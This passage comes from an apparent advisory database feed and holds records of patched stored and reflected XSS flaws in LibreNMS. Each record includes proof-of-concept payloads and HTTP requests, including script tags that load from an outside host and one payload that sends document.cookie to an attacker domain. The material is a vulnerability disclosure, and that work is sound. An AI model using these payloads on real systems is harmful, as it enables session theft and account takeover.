Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Custom OID\" tab of the device. This could lead to the compromise of user accounts and unauthorized actions being performed on their behalf.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:46:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-gv4m-f6fx-859x","https://github.com/librenms/librenms/commit/42b156e42a3811c23758772ce8c63d4d3eaba59b","https://nvd.nist.gov/vuln/detail/CVE-2024-51497","https://github.com/advisories/GHSA-gv4m-f6fx-859x"],"source_kind":"github","identifiers":["GHSA-gv4m-f6fx-859x","CVE-2024-51497"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.661Z","updated_at":"2026-09-03T00:06:51.050Z","epss_percentage":0.00411,"epss_percentile":0.33872,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ndjRtLWY2ZngtODU5eM4ABBZJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ndjRtLWY2ZngtODU5eM4ABBZJ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ndjRtLWY2ZngtODU5eM4ABBZJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yOHA3LWY2aDYtM2poM84ABBZI","url":"https://github.com/advisories/GHSA-28p7-f6h6-3jh3","title":"LibreNMS has a Reflected XSS ('Cross-site Scripting') in librenms/includes/html/pages/wireless.inc.php","description":"### Summary\nA Reflected Cross-Site Scripting (XSS) vulnerability in the \"metric\" parameter of the \"/wireless\" and \"/health\" endpoints allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious \"metric\" parameter, potentially compromising their session and allowing unauthorized actions.\n\n### Details\nThe \"/wireless\" and \"/health\" endpoints are vulnerable to reflected XSS in the \"metric\" parameter. An attacker can inject the following XSS payload into the \"metric\" parameter:\n```\u003cscript\u003econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();\u003c!----\u003e```\n\nWhen the page is loaded with this malicious parameter, the script executes immediately. The vulnerability occurs due to improper sanitization of the \"metric\" parameter in the following sinks:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/wireless.inc.php#L82\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/health.inc.php#L114\n\n### PoC\n1. Inject the following payload into the \"metric\" parameter of the \"/wireless\" or \"/health\" endpoint:\n```\u003cscript\u003econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();\u003c!----\u003e```\n2. Access the page with the injected payload.\n3. Observe that the injected script executes upon loading the page.\n\nExample URL: ```http://\u003cyour_url\u003e/wireless/metric=%3Cscript%3Econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();%3C!----%3E```\n\nExample Request:\n```http\nGET /wireless/metric=%3Cscript%3Econstructor[%27constructor%27](atob(%27Y29uZmlybShkb2N1bWVudC5kb21haW4p%27))();%3C!----%3E HTTP/1.1\nHost: \u003cyour_host\u003e\nCookie: \u003cyour cookies\u003e\n```\n\n### Impact\n\nThis vulnerability allows attackers to execute arbitrary JavaScript in the context of a user’s session by crafting a malicious URL. The attack could lead to session hijacking, unauthorized actions, or further exploitation by injecting malicious scripts.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:45:31.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-28p7-f6h6-3jh3","https://github.com/librenms/librenms/commit/aef739a438ffb507e927a4ec87b359164a7a053a","https://nvd.nist.gov/vuln/detail/CVE-2024-51496","https://github.com/advisories/GHSA-28p7-f6h6-3jh3"],"source_kind":"github","identifiers":["GHSA-28p7-f6h6-3jh3","CVE-2024-51496"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.699Z","updated_at":"2026-09-03T00:06:51.050Z","epss_percentage":0.00415,"epss_percentile":0.34509,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yOHA3LWY2aDYtM2poM84ABBZI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yOHA3LWY2aDYtM2poM84ABBZI","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yOHA3LWY2aDYtM2poM84ABBZI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wNjZxLXBwd3ItcTVqOM4ABBZH","url":"https://github.com/advisories/GHSA-p66q-ppwr-q5j8","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/dev-overview-data.inc.php","description":"### Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability in the Device Overview page allows authenticated users to inject arbitrary JavaScript through the \"overwrite_ip\" parameter when editing a device. This vulnerability results in the execution of malicious code when the device overview page is visited, potentially compromising the accounts of other users.\n\n### Details\n\nThe vulnerability occurs when editing a device. An attacker can inject arbitrary JavaScript into the \"overwrite_ip\" parameter. This malicious script is then executed in the \"Assigned IP\" field when the device overview page is loaded.\n\nThe payload used to exploit this vulnerability is: `test'\"\u003e\u003cscript src=//15.rs\u003e\u003c/script\u003e`\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe root cause of this vulnerability is the application's failure to properly sanitize the \"overwrite_ip\" value before including it in the HTML output. This is evident in the following line of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/dev-overview-data.inc.php#L42\n\n### PoC\n\n1. Edit a device and use the following payload in the \"overwrite_ip\" parameter: `test'\"\u003e\u003cscript src=//15.rs\u003e\u003c/script\u003e`\n2. Save the changes.\n3. Navigate to the device overview page.\n4. Observe that the injected script executes in the \"Assigned IP\" field.\n\n```http\nPOST /device/14/edit HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026editing=yes\u0026display=\u0026overwrite_ip=test'\"\u003e\u003cscript+src=//15.rs\u003e\u003c/script\u003e\u0026descr=\u0026type=\u0026parent_id%5B%5D=15\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Compromised accounts could lead to unauthorized actions being taken on behalf of the impacted users.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:44:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-p66q-ppwr-q5j8","https://github.com/librenms/librenms/commit/4568188ce9097a2e3a3b563311077f2bb82455c0","https://nvd.nist.gov/vuln/detail/CVE-2024-51495","https://github.com/advisories/GHSA-p66q-ppwr-q5j8"],"source_kind":"github","identifiers":["GHSA-p66q-ppwr-q5j8","CVE-2024-51495"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.736Z","updated_at":"2026-09-03T00:06:51.051Z","epss_percentage":0.00407,"epss_percentile":0.34187,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNjZxLXBwd3ItcTVqOM4ABBZH","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wNjZxLXBwd3ItcTVqOM4ABBZH","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNjZxLXBwd3ItcTVqOM4ABBZH/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NjYzLTM3cmctYzM3N84ABBZG","url":"https://github.com/advisories/GHSA-7663-37rg-c377","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"descr\" parameter when editing a device's port settings. This vulnerability can lead to the execution of malicious code when the \"Port Settings\" page is visited, potentially compromising the user's session and allowing unauthorized actions.\n\n### Details\nWhen editing a device's port settings, an attacker can inject the following XSS payload into the \"descr\" parameter:\n```lo'\"\u003e\u003cscript/src=//15.rs\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe payload triggers when the \"Port Settings\" page is visited, exploiting the `$port-\u003eifAlias` variable in the application. The sink is located here:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L82\n\n### PoC\n1. Edit a device's port settings using the following payload in the \"descr\" parameter:\n```lo'\"\u003e\u003cscript/src=//15.rs\u003e```\n2. Save the changes.\n3. Navigate to the \"Port Settings\" page of the device.\n4. Observe that the injected script executes.\n\nExample Request:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRF-TOKEN: \u003cyour_token\u003e\nX-Requested-With: XMLHttpRequest\nCookie: \u003cyour_cookie\u003e\n\ntype=update-ifalias\u0026descr=lo'%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026ifName=lo\u0026port_id=1\u0026device_id=1\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Port Settings\" page of the device. This could lead to the compromise of user accounts and unauthorized actions performed on their behalf.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:43:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-7663-37rg-c377","https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0","https://nvd.nist.gov/vuln/detail/CVE-2024-51494","https://github.com/advisories/GHSA-7663-37rg-c377"],"source_kind":"github","identifiers":["GHSA-7663-37rg-c377","CVE-2024-51494"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.770Z","updated_at":"2026-09-03T00:06:51.051Z","epss_percentage":0.00407,"epss_percentile":0.34187,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NjYzLTM3cmctYzM3N84ABBZG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NjYzLTM3cmctYzM3N84ABBZG","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NjYzLTM3cmctYzM3N84ABBZG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00bTVyLXcycnEtcTU0cc4ABBZF","url":"https://github.com/advisories/GHSA-4m5r-w2rq-q54q","title":"LibreNMS has a Persistent XSS from Insecure Input Sanitization Affects Multiple Endpoints","description":"### Summary\n\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.\n\n### Details\n\nUser with Admin role can edit the Display Name of a device, the application did not properly sanitize the user input in the device Display Name, if java script code is inside the name of the device Display Name, its can be trigger from different sources.\n\n### PoC\n\n1. Use an Admin role user to change the Display Name of a device into the payload `\u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e`\n\n![image](https://github.com/user-attachments/assets/a0cce15d-fa25-46cf-a16d-648b501724a4)\n\n2.1. Go to manage user and choose Manage Access\n\n![image](https://github.com/user-attachments/assets/079bd7a7-c153-4630-a59e-416bbbaf267b)\n\n2.2. A pop-up will show\n\n![image](https://github.com/user-attachments/assets/2fe15976-c25d-4ba5-a9c1-08cfaa5c1c5b)\n\n3.1. Create a new Alert Rule where it will check if the device is up or down by using ICMP and then add the rule to the device.\n\n![image](https://github.com/user-attachments/assets/135093ba-d28c-4fe4-871d-950a2d521b01)\n\n3.2. Once the device is down, there will be an alert in the Alerts Notifications\n\n![image](https://github.com/user-attachments/assets/f32461be-aee2-43e7-ba50-977ed27754b4)\n\n3.3. Hover over the Hostname will see a pop-up.\n\n![image](https://github.com/user-attachments/assets/314eed99-1372-40e8-818f-4494679e476e)\n\n4.1. The same can be trigger in the Alert History once hover over the Device field.\n\n![image](https://github.com/user-attachments/assets/33dd2045-2c21-4305-a7a6-8c09101baf81)\n\n5.1. The same can be trigger once hover over the Hostname field from the Event Log of the device.\n\n![image](https://github.com/user-attachments/assets/a8a80dc7-4678-4334-a03a-e38d61e55e1c)\n\n6.1. The same can be trigger in the Outages function in the Logs of the device.\n\n![image](https://github.com/user-attachments/assets/b25d1c20-de6d-4c8d-bfab-59691b3faf1e)\n\n7.1. In the Active Alerts of the device.\n\n![image](https://github.com/user-attachments/assets/73571f83-56e2-4e6f-9af4-621df2a0ccdd)\n\n8.2. In the Alert History of the device.\n\n![image](https://github.com/user-attachments/assets/1fa4a86b-4469-4e09-a4d8-174529138199)\n\n9.1. They can also be trigger in the dashboard.\n\n![image](https://github.com/user-attachments/assets/0d3f3926-b41d-48d2-9212-cbd5692f6a9e)\n\n![image](https://github.com/user-attachments/assets/6f36fc02-eae5-4a46-b6ba-f99a8d1db8a8)\n\n10.1. Also if change the payload into `\u003cimg src=\"x\" onerror=\"alert(document['cookie'])\"\u003e`, it can also be trigger in the Availability Map.\n\n![image](https://github.com/user-attachments/assets/9ed7ebb1-4906-43f0-aa96-313fe722a533)\n\n![image](https://github.com/user-attachments/assets/d7c57840-4431-4ccb-b688-e813c83ac20c)\n\n### Impact\n\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions.\nImpacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:41:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-4m5r-w2rq-q54q","https://github.com/librenms/librenms/commit/bb4731419b592867bf974dde525e536606a52976","https://nvd.nist.gov/vuln/detail/CVE-2024-50355","https://github.com/advisories/GHSA-4m5r-w2rq-q54q"],"source_kind":"github","identifiers":["GHSA-4m5r-w2rq-q54q","CVE-2024-50355"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.796Z","updated_at":"2026-09-03T00:06:51.051Z","epss_percentage":0.00323,"epss_percentile":0.25254,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00bTVyLXcycnEtcTU0cc4ABBZF","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00bTVyLXcycnEtcTU0cc4ABBZF","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00bTVyLXcycnEtcTU0cc4ABBZF/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcjhmLTVxcWctajN3Z84ABBZE","url":"https://github.com/advisories/GHSA-qr8f-5qqg-j3wg","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/overview/services.inc.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Services\" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions.\n\n### Details\nWhen creating a device through the \"edit device -\u003e services\" workflow (example path: \"/device/15/edit/section=services\"), the attacker can inject an XSS payload in the \"name\" parameter. This payload is then reflected in the \"Services\" section of the \"Overview\" page of the device. It is important to note that the vulnerability does not exist when creating devices through the normal \"Add Service\" interface (created through the ajax_form.php request with the \"type=create-service\").\n\nThe payload used to exploit this vulnerability is:\n```Name'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe root cause is the application's failure to sanitize the \"name\" parameter before outputting it in the HTML. The sinks are as follows:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview/services.inc.php#L36\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview.inc.php#L74\n\n### PoC\n1. Create a service for a device using the following payload in the \"name\" parameter:\n```Name'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n2. Save the service.\n3. Navigate to the \"Overview\" page of the device.\n4. Observe that the injected script executes in the \"Services\" section of the page.\n\nExample Request:\n\n```http\nPOST /device/15/edit/section=services HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026name=Name'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026addsrv=yes\u0026device=15\u0026type=pollen\u0026descr=Descr'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026ip=IP'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026params=Params'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Services\" section of the device's overview page. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:39:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg","https://github.com/librenms/librenms/commit/b4af778ca42c5839801f16ece53505bb7fa1e7bc","https://nvd.nist.gov/vuln/detail/CVE-2024-50352","https://github.com/advisories/GHSA-qr8f-5qqg-j3wg"],"source_kind":"github","identifiers":["GHSA-qr8f-5qqg-j3wg","CVE-2024-50352"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.829Z","updated_at":"2026-09-03T00:06:51.052Z","epss_percentage":0.37557,"epss_percentile":0.98418,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjhmLTVxcWctajN3Z84ABBZE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcjhmLTVxcWctajN3Z84ABBZE","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjhmLTVxcWctajN3Z84ABBZE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12N3c5LTYzeGgtNnIzd84ABBZD","url":"https://github.com/advisories/GHSA-v7w9-63xh-6r3w","title":"LibreNMS has a Reflected XSS ('Cross-site Scripting') in librenms/includes/functions.php","description":"### Summary\nA Reflected Cross-Site Scripting (XSS) vulnerability in the \"section\" parameter of the \"logs\" tab of a device allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious \"section\" parameter, potentially compromising their session and enabling unauthorized actions. The issue arises from a lack of sanitization in the \"report_this()\" function.\n\n### Details\nThe \"section\" parameter of the \"logs\" tab is vulnerable to reflected XSS. An attacker can inject the following XSS payload into the \"section\" parameter:\n```\u003cscript\u003econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();\u003c%2fscript\u003e```\n\nWhen the page is loaded with this malicious parameter, the script executes immediately. This vulnerability occurs due to the lack of sanitization in the \"report_this()\" function. Other endpoints using this same function may also be vulnerable.\n\nThe vulnerable sink is located here:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/functions.php#L523\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/logs.inc.php#L93\n\n### PoC\n1. Inject the following payload into the \"section\" parameter of the \"logs\" tab:\n```\u003cscript\u003econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();\u003c%2fscript\u003e```\n2. Access the page with the injected payload.\n3. Observe that the injected script executes when the page is loaded.\n\nExample URL: ```http://\u003cyour_url\u003e/device/device=1/tab=logs/section=%3Cscript%3Econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();%3C%2fscript%3E/```\n\nExample Request:\n```http\nGET /device/device=1/tab=logs/section=%3Cscript%3Econstructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();%3C%2fscript%3E/ HTTP/1.1\nHost: \u003cyour_host\u003e\nCookie: \u003cyour_cookie\u003e\n```\n\n### Impact\n\nThis vulnerability allows attackers to execute arbitrary JavaScript in the context of a user’s session by crafting a malicious URL. The attack could lead to session hijacking, unauthorized actions, or further exploitation by injecting malicious scripts.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:34:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-v7w9-63xh-6r3w","https://github.com/librenms/librenms/commit/6a14a9bd767c6e452e4df77a24126c3eeb93dcbf","https://nvd.nist.gov/vuln/detail/CVE-2024-50351","https://github.com/advisories/GHSA-v7w9-63xh-6r3w"],"source_kind":"github","identifiers":["GHSA-v7w9-63xh-6r3w","CVE-2024-50351"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.863Z","updated_at":"2026-09-03T00:06:51.052Z","epss_percentage":0.00398,"epss_percentile":0.33265,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12N3c5LTYzeGgtNnIzd84ABBZD","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12N3c5LTYzeGgtNnIzd84ABBZD","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12N3c5LTYzeGgtNnIzd84ABBZD/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14aDRnLWM5cDYtNWp4Z84ABBY1","url":"https://github.com/advisories/GHSA-xh4g-c9p6-5jxg","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the \"Port Settings\" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions.\n\n### Details\nWhen creating a new \"Port Group,\" an attacker can inject the following XSS payload into the \"name\" parameter:\n```\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe payload triggers when the affected Port Group is added to a device and the \"Port Settings\" page is reloaded. The vulnerability is due to insufficient sanitization of the \"name\" parameter. The sink responsible for this issue is:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69\n\n### PoC\n1. Create a new Port Group using the following payload in the \"name\" parameter:\n```name\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n2. Add the Port Group to a device's port settings.\n3. Reload the \"Port Settings\" page.\n4. Observe that the injected script executes.\n\nExample Request:\n```http\nPOST /port-groups HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026name=name\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026desc=descr\u003cscript/src=//15.rs\u003e\u003c/script\u003e\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Port Settings\" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:30:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-xh4g-c9p6-5jxg","https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0","https://nvd.nist.gov/vuln/detail/CVE-2024-50350","https://github.com/advisories/GHSA-xh4g-c9p6-5jxg"],"source_kind":"github","identifiers":["GHSA-xh4g-c9p6-5jxg","CVE-2024-50350"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.897Z","updated_at":"2026-09-03T00:06:51.052Z","epss_percentage":0.00391,"epss_percentile":0.32439,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aDRnLWM5cDYtNWp4Z84ABBY1","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14aDRnLWM5cDYtNWp4Z84ABBY1","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aDRnLWM5cDYtNWp4Z84ABBY1/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ybXI0LXg2YzktamM2OM4ABBY0","url":"https://github.com/advisories/GHSA-rmr4-x6c9-jc68","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.\n\n### Details\nWhen creating a new device, an attacker can inject the following XSS payload into the \"hostname\" parameter:\n\n```\ntest'\" autofocus onfocus=\"document.location='https://\u003cattacker_domain\u003e/logger.php?c='+document.cookie\"\n```\n\n(Note: You may need to URL-encode the '+' sign in the payload.)\n\nThe payload triggers automatically when visiting the \"Capture Debug Information\" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies.\n\nThe vulnerability is due to insufficient sanitization of the \"url\" variable before it is output in the HTML. This is evident in the following lines of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55\n\n### PoC\n1. Create a new device with the following payload in the \"hostname\" parameter:\n```\ntest'\" autofocus onfocus=\"document.location='https://\u003cattacker_domain\u003e/logger.php?c='+document.cookie\"\n```\n2. Save the device.\n3. Navigate to the \"Capture Debug Information\" page for the device.\n4. Observe that the injected script triggers and redirects the user to the attacker's domain, sending cookies.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: 